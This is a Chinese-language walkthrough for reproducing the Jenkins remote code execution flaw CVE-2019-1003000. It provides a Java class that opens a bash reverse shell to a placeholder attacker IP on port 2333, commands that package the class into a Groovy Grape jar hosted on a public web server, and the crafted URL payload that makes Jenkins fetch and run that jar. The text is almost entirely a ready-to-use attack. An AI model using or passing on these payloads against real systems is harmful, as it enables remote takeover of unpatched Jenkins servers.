jenkins RCE(CVE-2019-1003000)复现

前言:漏洞详情直接搜cve编号查看即可,这里直接复现

1.制作一个反弹bash的jar包放在公网可远程调用,以下代码保存为jkrce.java
代码如下:

public class jkrce {
  public jkrce() {
    try {
     String payload = "bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/2333 0>&1";
     String[] cmds = { "/bin/bash", "-c", payload };
     java.lang.Runtime.getRuntime().exec(cmds);
    } catch (Exception e) {
} 
}
}

2.创建文件夹META-INF/serverices/,编译并写jkrce类到META-INF/serverices/org.codehaus.groovy.plugins.Runners里,如下:

javac jkrce.java //编译
mkdir -p META-INF/services/    //创建文件夹
echo jkrce > META-INF/services/org.codehaus.groovy.plugins.Runners //写入类META-INF里
jar cvf jenkins-1.jar ./       //打包成jar包

3.在公网服务器里,创建路径/tools/jenkins/1/

mkdir /home/wwwroot/default/tools/jenkins/1/    //lnmp的web文件夹里创建,这个路径一定要这样。(当然可以修改poc里面的信息,实现修改路径)

4.poc xxx.xxx.xxx.xxx替换成公网地址即可,其他不用填写。

/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/[email protected](disableChecksums=true)%[email protected](name=%27payload%27,root=%27http://xxx.xxx.xxx.xxx/%27)%[email protected](group=%27tools%27,module=%27jenkins%27,version=%271%27)%0aimport jkrce;

等待反弹成功,成功后web页面提示如下:

{"column":0,"line":0,"message":"","status":"success"}